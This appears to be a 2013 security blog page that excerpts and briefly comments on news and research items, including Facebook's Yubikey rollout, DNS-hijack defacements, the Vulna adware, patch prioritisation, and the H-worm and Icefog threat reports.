Facebook Pushes Passwords One Step Closer to Death | Wired Enterprise | Wired.com

October has always been John Flynn’s favorite time of year, but this year, it’s even better. He gets to spend the month trying to hack into a fleet of Facebook computers equipped with a new kind of security tool — a tool that takes computer security beyond the password.

Since jumping to Facebook from his job at Google a few years ago, Flynn has been part of the Facebook security team that masquerades as bad guys during the month of October, doing their best to bust into the corporate network that underpins the social networking giant. They call it “Hacktober,” and the idea is to find the holes where the real bad guys might attack the company. Last year, Flynn and other Facebook security engineers created a fake news story designed to spread a computer worm around the network.

Flynn — who goes by the nickname “Four” — won’t say what’s in store for Facebook’s employees this October, but one thing seems certain: Hacking them is going to be that much more of a challenge. Over the past year, the company has equipped many employee systems with Yubikeys, a little pieces of hardware that let employees securely log into machines with the tap of a finger. This nifty tool can make it that much harder for hackers to bust into a corporate network and do whatever they want — even if the hacker manages to take command of an authorized network machine.

via Facebook Pushes Passwords One Step Closer to Death | Wired Enterprise | Wired.com.

Hackers target high profile domains – Securelist

During the last days, several high profile domains have been defaced including domains from two prominent security companies. In addition to these, high profile domains such as alexa.com, whatsapp.com and redtube.com were also defaced. From our quick analysis It does not seem that the actual webserver has been compromised, the most possible attack vector was that the DNS have been hijacked.

When looking into this, there are some quite obvious traces but nothing that really confirms what the hackers did; or what kind of information they were able to obtain. When analyzing previous compromises and defaces it seems that there is a “new” trend within hacking groups and defacers to go for the DNS or domain registrars instead of compromising the actual webserver. When quickly analyzing the domain there were two indicators that stood out.

via Hackers target high profile domains – Securelist.

Read on for the details and the two interesting indicators.

ISC Diary | Microsoft October 2013 Patch Tuesday

Overview of the October 2013 Microsoft patches and their status, via ISC Diary | Microsoft October 2013 Patch Tuesday.

Microsoft scores these as four critical and three important patches. The ISC’s scoring is more refined, so read the article for the breakdown grid. The big news is the fix for the IE vulnerabilities.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions | FireEye Blog

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as “Vulna,” is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna’s aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggresive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggresive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing it.

Recently FireEye discovered a new mobile threat from a popular ad library that no other antivirus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

via Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions | FireEye Blog.

I’m just starting to read up on this. Does anyone know of reliable secondary sources?

Securing More Vulnerabilities By Patching Less — Dark Reading

As a penetration tester, Mauricio Velazco frequently looked for information on the latest attacks because corporate information systems were rarely patched against the exploitation of just-reported vulnerabilities.

When he moved over to the other side of the firewall, Velazco — now the head of threat intelligence and vulnerability management at The Blackstone Group, an investment firm — duly implemented a patching process for his company that attempted to keep up with its regulated responsibilities. It quickly became clear, however, that fixing vulnerabilities using the criticality of the bugs to prioritize patching kept the IT staff busy, but it did not make the company much safer.

Thinking back to his time as a penetration tester, Velazco realized that patching the vulnerabilities he chased as an attacker would be a much better use of his time. The strategy paid off: Compromises within the company fell, he says.

via Securing More Vulnerabilities By Patching Less — Dark Reading.

Hmm. This is, to me, a new take on patch management. It oddly falls in with a discussion I had almost two years ago, oddly in that my peers and I came up with the same concept for different but related reasons.

What do you think?

Tech Insight: Top 4 Problem Areas that Lead to Internal Data Breaches

External data breaches from groups like Anonymous and internal data leaks from insiders such as Edward Snowden have enterprises questioning and rethinking their security programs. Are they doing enough to protect their data? Are there security controls effective? Would they be able to respond appropriately to a data breach and contain it quickly?

Much of the questions and confusion has to do with executives not understanding where their critical assets are and how they need to be protected. Their sense of security is skewed by the fact that they’ve passed their compliance requirements causing them to think they are safe. For most companies, if they were truly targeted by a sophisticated and determined attacker, they would fail miserably.

Why would they fail? Traditionally, security was focused on protecting the perimeter. Based on my experience with penetration testing organizations from all different industries, companies are doing a great job of locking down there externally exposed assets, with the exception of Web servers. There are fewer devices exposed and even less ports open that could provide an avenue for attack.

via Tech Insight: Top 4 Problem Areas that Lead to Internal Data Breaches.

Read the article for the details, but the four problem areas are:

  1. Asset management and putting in place proper protection mechanisms for those assets
  2. Not knowing or understanding the “principle of least privilege” (I’d also add “default deny”) and “need to know”
  3. Security training and awareness
  4. Shared credentials and password resuse

In my opinion items 1, 2, and 4 tie into my preference for dealing with security’s “low hanging fruit”, the basic tenets we all should do 100% of the time. Security awareness and training has value, but I think there’s too much focus on it. That focus takes time, money, and effort away from those security tenets I mentioned before.

 

ISC Diary | Tools for reviewing infected websites

At the ISC we had a report today from Greg about obfuscated Javascript on the site hxxp://fishieldcorp.com/. A little research revealed that this site has been infected in the past. Nothing extraordinary, just another run of the mill website infection.

What did strike me is how the nature of this research has changed in recent years. Not so long ago checking out a potentially infected website would have involved VMs or goat machines and a lot of patience and trial and error. Today there are so many sites that will do the basics for you. Greg sent us a link to URLQuery which displays a lot of information about a website including the fact that this one is infected.

via ISC Diary | Tools for reviewing infected websites.

Cisco launches open-source tool for penetration testers | ZDNet

Cisco has opened up access to Kvasir, which helps penetration testers worldwide assess the security levels of computer systems at a glance.

In a blog post, Kurt Grutzmacher, solutions architect at Cisco’s Security Practice Advanced Services team, said that the tool was initially created for the Cisco Systems Advanced Services Security Posture Assessment (SPA) team to keep track of the tests and data collected by the firm’s penetration testers.

A pen test is a way to test a system’s security standard by simulating a cyberattack.

During typical assessments of network security, pen testers may analyze between 2,000 and 10,000 hosts for vulnerabilities, perform various exploitation methods such as account enumeration and password attempts, and then they have to collect, sift through and document the results.

via Cisco launches open-source tool for penetration testers | ZDNet.

Now You See Me – H-worm by Houdini | FireEye Blog

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

via Now You See Me – H-worm by Houdini | FireEye Blog.

The Icefog APT: A Tale of Cloak and Three Daggers – Securelist

The world of Advanced Persistent Threats (APTs) is well known. Skilled adversaries compromising high-profile victims and stealthily exfiltrating valuable data over the course of many years. Such teams sometimes count tens or even hundreds of people, going through terabytes or even petabytes of exfiltrated data.

Although there has been an increasing focus on attribution and pinpointing the sources of these attacks, not much is known about a new emerging trend: the smaller hit-and-run gangs that are going after the supply chain and compromising targets with surgical precision.

Since 2011 we have been tracking a series of attacks that we link to a threat actor called ‘Icefog’. We believe this is a relatively small group of attackers that are going after the supply chain — targeting government institutions, military contractors, maritime and ship-building groups, telecom operators, satellite operators, industrial and high technology companies and mass media, mainly in South Korea and Japan. This Icefog campaigns rely on custom-made cyber-espionage tools for Microsoft Windows and Apple Mac OS X. The attackers directly control the infected machines during the attacks; in addition to Icefog, we noticed them using other malicious tools and backdoors for lateral movement and data exfiltration.

via The Icefog APT: A Tale of Cloak and Three Daggers – Securelist.

%d bloggers like this: